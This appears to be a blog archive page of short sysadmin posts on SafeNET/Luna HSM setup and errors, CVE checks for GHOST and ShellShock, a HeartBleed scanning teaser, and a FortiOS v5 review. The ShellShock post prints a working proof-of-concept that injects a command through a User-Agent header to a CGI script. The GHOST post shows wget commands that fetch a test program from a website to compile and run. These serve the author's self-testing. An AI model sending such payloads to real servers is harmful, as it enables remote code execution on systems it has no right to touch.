SafeNET PKCS Keypair generation failed

If you run a SafeNET HSM box with soft 6 and firmware 6.22 in FIPS mode you will meet errors while generating RSA PKCS keypair. As you can see on the following test, PKCS mechanism gives “Key pair generation failed” .
Also, HSM always returns CKR_MECHANISM_INVALID to your requesting application. For example, SUN Java PKCS provider should return something like this.
sun.security.pkcs11.wrapper.PKCS11Exception: CKR_MECHANISM_INVALID

C:\Program Files\SafeNet\LunaClient>Cmu.exe gen
Please enter password for token in slot 0 : ****************
Enter key type – [1] RSA [2] DSA [3] ECDSA : 1

Select RSA Mechanism Type –
[1] PKCS [2] FIPS 186-3 Only Primes [3] FIPS 186-3 Auxiliary Primes : 1
Enter modulus length (8 bit multiple) : 2048
Select public exponent – [1] 3 [2] 17 [3] 65537 : 3
Key pair generation failed

CKM_RSA_PKCS_KEY_PAIR_GEN is disabled in FIPS mode in 6.0/6.22. I havent tried but you have an option “Mechanism Remap for FIPS Compliance” please refer to your HSM guide. But if you get an firmware software update, be careful with this setting, which makes it appear you are getting a new, secure mechanism, when really you are getting an outdated, insecure mechanism. Anyway, it is better to run what FIPS says. Don’t play around :)

Here are the supported mechasims chart
HSMFIPS

SafeNET HSM LunaSA ile Client Arasında NTL Oluşturma

Aşağıda, HSM cihazımız üzerinde tanımlanmış clientları ilgili partition(slotlara) NTL kullanarak tanıtma adımlarını bulacaksınız. Daha önce cihaz üzerinde partition oluşturulduğunu ve ilgili clientların HSM cihazına tanıtıldığını farzediyorum.

cihaz üzerinde bulunan partitionları aşağıdaki komutla listeyebilirsiniz.
[HSM] lunash:>partition list
Storage (bytes)
—————————-
Partition Name Objects Total Used Free
===========================================================================
1110641543200 testpartition 0 1039288 0 1039288
Command Result : 0 (Success)
Continue reading “SafeNET HSM LunaSA ile Client Arasında NTL Oluşturma”

SafeNET HSM LunaSA Client Tanıtma Adımları

Bu döküman öncesinde http://java.com/en/download/manual.jsp son java versionu ve ilgili LUNA Client kurulumunu yapmış olmanız gerekiyor.

Aşağıdaki adımları uygulayacağımız makinada Microsoft Windows(Client) işletim sistemi vardır.HSM ve Luna client arasındaki iletişim NTL olacaktır.
Aşağıdaki adımları uygulamadan önce HSM cihazınızın initialize işlemleri bitmiş, NTLS servislerinin çalıştığını, server sertifikasının düzgün oluşturulduğunu ve cihaza SSH erişiminizin olduğunu teyid ediniz.

Continue reading “SafeNET HSM LunaSA Client Tanıtma Adımları”

GHOST: glibc gethostbyname buffer overflow – CVE-2015-0235

You can test your system against GHOST: glibc gethostbyname buffer overflow  CVE-2015-0235.

wget http://www.cirgan.net/GHOST.c
or compiled one
wget http://www.cirgan.net/GHOST

root@testme /home # gcc GHOST.c -o GHOST
root@testme /home # ./GHOST
not vulnerable

 

CVE-2014-6271 (ShellShock) remote code execution PoC

create a file for cgi execution
vi dummy.sh

fill with sample innocent code
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "dummy output"

execute it
curl -H 'User-Agent: () { :;}; echo boom>/tmp/boom'  http://localhost/cgi-bin/dummy.sh
dummy output

and see if the file is created
ls -l /tmp/boom
-rw-r--r--. 1 apache apache 5 Sep 25 21:20 /tmp/boom
 

GNU Bash (ShellShock) Vulnerability – CVE-2014-6271

A critical vuln has been discovered recently. Check for more information

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

also you can check your server via shell with the command below.

env x='() { :;}; echo vulnerable!’ bash -c ””

a patched system output looks like this

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’

 

Scanning OpenSSL HeartBleed Vuln with Nmap

heartbleed

There is serious vulnerability OpenSSL cryptographic software library which allows stealing the protected  information ..
This bug allows anyone on the Internet to read the memory of the system which runs the vulnerable OpenSSL version. So the attackers easily eavesdrop the secret keys, usernames,passwords which resides in the memory…
Continue reading “Scanning OpenSSL HeartBleed Vuln with Nmap”

FortiOS v5.0 at a glance..

Today I spent a few minutes to review new FortiOS major release version 5.

There are some reasonable changes at GUI.. At first sight, VDOMs are seperated from GLOBAL Menu.. A new feature we can now assign device based rules. Also Policy screen has some modifications .. Now we have to select two types of Policy before creating a new one.

Firewall and VPN.. Actually we had these ones already. But now they are more user-friendly in the GUI.
Firewall policy got three sub-types.. We have to select one of them ( Address , Identity Based or the new one “Device Identity” )..VPN policy has also 2 types. as you can guess.. SSL and IPSEC..

Device-Based rules has a simple idea behind it. You simply group devices by their MAC addresses. Indeed, we will be able to add MAC-Based Policy from now on..

In short words.. FortiOS v5.0 will not bring incredible features.. It just have some GUI modifications and some minor features against their major release.. But there should be lots of improvement in the background.. I will review it later but at first sight, v5 is disappointment for me.